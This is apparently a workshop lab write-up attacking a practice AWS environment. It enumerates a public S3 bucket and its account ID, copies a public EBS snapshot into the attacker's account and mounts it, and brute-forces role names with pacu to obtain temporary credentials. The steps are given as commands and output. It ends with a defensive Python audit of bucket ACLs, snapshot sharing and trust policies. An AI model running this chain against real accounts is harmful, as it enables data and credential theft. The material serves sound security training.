Sources: https://www.aviata.cloud/ACE135-J04-WORKBOOK/chapter01/index.html and https://github.com/sans-sec588/sec588-workshop-containers-ace135/tree/main

Known information:

* arn:aws:iam::3[REDACTED]8:role/s3-searcher (ARN of the role in the attacker's account)
* Domain: aviata.cloud

# How to get an account from a bucket

Find subdomains:

```
subfinder -d aviata.cloud -o /root/workdir/subfinder.txt
```

We get two domains:

* dev.aviata.cloud
* aviata.cloud

One of these two sites is an S3 bucket; check with the following tool:

```
(venv) root@588ace135fab:~/workdir# s3scanner -bucket-file /root/workdir/subfinder.txt
INFO not_exist | aviata.cloud
INFO exists | dev.aviata.cloud | us-east-2 | AuthUsers: [] | AllUsers: [READ]
```

So dev.aviata.cloud is an S3 bucket, and it is readable by AllUsers.

https://github.com/WeAreCloudar/s3-account-search

This tool lets you find the account ID an S3 bucket belongs to. There is an IAM policy condition, s3:ResourceAccount, that is meant to be used to give access to S3 in a specified account (or set of accounts), but it also supports wildcards. In other words, when S3 grants access to specific accounts, we can find the IDs of those accounts.
Use the attacker's role to retrieve the account ID. Required permissions: s3:ListBucket, s3:GetObject.

```
root@588ace135fab:~# s3-account-search --profile default arn:aws:iam::17[EXAMPLE]3:role/s3-searcher dev.aviata.cloud
Starting search (this can take a while)
found: 3
found: 31
found: 97[
found: 97[E
found: 97[EX
found: 97[EXA
found: 97[EXAM
found: 97[EXAMP
found: 97[EXAMPL
found: 97[EXAMPLE
found: 97[EXAMPLE]
found: 97[EXAMPLE]8
```

# Snapshots in Accounts

EBS snapshots can be made public by mistake (they should be private).

https://github.com/RhinoSecurityLabs/pacu

Pacu is an open-source AWS exploitation framework. Its `ebs__enum_snapshots_unauth` module uses our keys to search for EBS snapshots located in the target organization's account, i.e. it finds the EBS snapshots an account holds.

Run pacu to list the EBS snapshots:

```
Pacu (workshop:from_default) > run ebs__enum_snapshots_unauth --account-id 97[EXAMPLE]8
```

Snapshot found:

```
Keyword/AccountId: 97[EXAMPLE]8, SnapshotId: snap-0a[EXAMPLE]2, Region: us-east-2, Description: , OwnerId: 97[EXAMPLE]8, Encrypted: False
```

Copy the snapshot into our account:

```
aws ec2 copy-snapshot --region us-east-2 --source-region us-east-2 --description "Taken Snapshot" --query 'SnapshotId' --output text --source-snapshot-id snap-0a[EXAMPLE]2
```

Save the following environment variables (SnapshotId is the ID returned by copy-snapshot; AMI is the newest Ubuntu 22.04 image published by owner 099720109477):

```
SnapshotId="snap-0e3c953b5afc8746f"
AMI=$(aws ec2 describe-images --filters 'Name=name,Values=ubuntu/images/hvm-ssd/ubuntu-jammy-22.04-amd64-server-*' --owners 099720109477 --query 'Images[*].[ImageId,CreationDate]' --region us-east-2 --output text | sort -k2 -r | head -n1 | awk '{ print $1 }')
```

Now launch an EC2 instance with the snapshot attached and look for information inside it.

Create a key pair:

```
aws ec2 create-key-pair --region us-east-2 --key-name attacker-key --query 'KeyMaterial' --output text > /root/workdir/attacker-key.pem
chmod 600 /root/workdir/attacker-key.pem
```

Create a mappings.json file that will allow us to mount the snapshot as a volume.
```
cat << EOF > /root/workdir/mappings.json
[
  {
    "DeviceName": "/dev/sdh",
    "Ebs": {
      "SnapshotId": "$SnapshotId"
    }
  }
]
EOF
```

```
aws ec2 run-instances --image-id $AMI \
  --region us-east-2 \
  --count 1 \
  --instance-type t2.micro \
  --key-name attacker-key \
  --security-group-ids sg-07[EXAMPLE]e \
  --subnet-id subnet-07[EXAMPLE]1 \
  --block-device-mappings file:///root/workdir/mappings.json
```

Connect to the EC2 instance, mount the disk and look for any sources of information we can find. (At this step you can check again which disk actually holds the data before mounting it.)

```
# EC2IP holds the public IP of the instance launched above
ssh -i /root/workdir/attacker-key.pem ubuntu@$EC2IP
sudo mount /dev/xvdh /mnt
cd /mnt
ls /mnt/
```

As it turns out, there is nothing in here :))

# AssumeRole attacks

Create a word list of potential names that Aviata could use for roles in their environment:

```
cat << EOF > /root/workdir/wordlist.txt
aviata
aviata-cloud
EOF
```

In pacu, run the AssumeRole targeting script:

```
run iam__enum_roles --word-list /root/workdir/wordlist.txt --account-id 97[EXAMPLE]8
```

```
[iam__enum_roles] {
  "Credentials": {
    "AccessKeyId": "ASIA[EXAMPLE]PJ",
    "SecretAccessKey": "WU3[EXAMPLE]Hlq",
    "SessionToken": "FwoG[EXAMPLE]A==",
    "Expiration": "2024-04-13 11:35:10+00:00"
  },
  "AssumedRoleUser": {
    "AssumedRoleId": "AROA[EXAMPLE]HBQY:8Er[EXAMPLE]XkeYk",
    "Arn": "arn:aws:sts::97[EXAMPLE]8:assumed-role/aviata/8Err[EXAMPLE]eYk"
  }
}
```

What did pacu do? It generated an ASIA (temporary access key) in the AWS environment. Now that we have found a role and generated an AWS account key for it, let's use it.

Once we have the access key, log in with it and list S3 to get the flag.
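Defender-side counterpart to the three findings in this write-up: the bucket readable by AllUsers, the snapshot any account could copy, and the `aviata` role that could be assumed from a foreign account. This is an added example, not code from the workshop, pacu or s3scanner. It checks documents in the shapes the AWS APIs return (GetBucketAcl, DescribeSnapshotAttribute for createVolumePermission, and a role's AssumeRolePolicyDocument) against constructed sample data, so every account and snapshot ID in it is a placeholder and it runs offline without credentials.

```python
"""Audit checks for the three exposures in this write-up (added example,
not workshop code). Sample documents below are constructed; all IDs are placeholders."""

OWN_ACCOUNT_ID = "111111111111"  # placeholder for the audited account
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}


def _as_list(value):
    """IAM policy fields may be a scalar or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def public_bucket_grants(acl: dict) -> list:
    """(group, permission) pairs granted to AllUsers or AuthenticatedUsers.
    A READ grant to AllUsers is what s3scanner reported as 'AllUsers: [READ]'."""
    found = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        group = PUBLIC_GROUPS.get(grantee.get("URI", ""))
        if grantee.get("Type") == "Group" and group:
            found.append((group, grant["Permission"]))
    return found


def snapshot_is_public(attr: dict) -> bool:
    """True when createVolumePermission contains the 'all' group, meaning any
    AWS account can copy the snapshot, as ebs__enum_snapshots_unauth found above."""
    return any(p.get("Group") == "all" for p in attr.get("CreateVolumePermissions", []))


def foreign_assume_role_principals(trust_policy: dict, own_account: str) -> list:
    """Principals allowed to sts:AssumeRole that are outside own_account and
    not pinned by an sts:ExternalId condition; a role with such a statement
    can be assumed from a foreign account, as the 'aviata' role was above."""
    foreign = []
    for stmt in _as_list(trust_policy.get("Statement")):
        actions = {a.lower() for a in _as_list(stmt.get("Action"))}
        if stmt.get("Effect") != "Allow" or not (actions & {"sts:assumerole", "sts:*"}):
            continue
        principal = stmt.get("Principal", {})
        aws_principals = ["*"] if principal == "*" else _as_list(principal.get("AWS"))
        has_external_id = any(
            any(k.lower() == "sts:externalid" for k in keys)
            for keys in stmt.get("Condition", {}).values()
        )
        for p in aws_principals:
            if (p == "*" or own_account not in p) and not has_external_id:
                foreign.append(p)
    return foreign


# Constructed sample documents (API shape only; IDs are placeholders).
SAMPLE_ACL = {
    "Owner": {"ID": "owner-canonical-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},
    ],
}
SAMPLE_SNAPSHOT_ATTR = {"SnapshotId": "snap-0placeholder",
                        "CreateVolumePermissions": [{"Group": "all"}]}
SAMPLE_TRUST_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "sts:AssumeRole",
         "Principal": {"AWS": "arn:aws:iam::222222222222:root"}},
        {"Effect": "Allow", "Action": "sts:AssumeRole",
         "Principal": {"AWS": f"arn:aws:iam::{OWN_ACCOUNT_ID}:root"}},
    ],
}


def audit(acl=SAMPLE_ACL, snapshot_attr=SAMPLE_SNAPSHOT_ATTR,
          trust_policy=SAMPLE_TRUST_POLICY) -> list:
    """Run all three checks and return the findings as strings."""
    findings = []
    for group, perm in public_bucket_grants(acl):
        findings.append(f"bucket ACL grants {perm} to {group}")
    if snapshot_is_public(snapshot_attr):
        findings.append(f"snapshot {snapshot_attr['SnapshotId']} is shared with all AWS accounts")
    for p in foreign_assume_role_principals(trust_policy, OWN_ACCOUNT_ID):
        findings.append(f"trust policy allows AssumeRole from {p} with no ExternalId")
    return findings


if __name__ == "__main__":
    for line in audit():
        print("FINDING:", line)
```

In a real account the same functions would be fed the output of `aws s3api get-bucket-acl`, `aws ec2 describe-snapshot-attribute --attribute createVolumePermission` and the `AssumeRolePolicyDocument` from `aws iam get-role`. The trust-policy check treats any principal outside the owning account that is not pinned with an `sts:ExternalId` condition as a finding; that is the condition which let the role above be assumed from another account once its name was guessed.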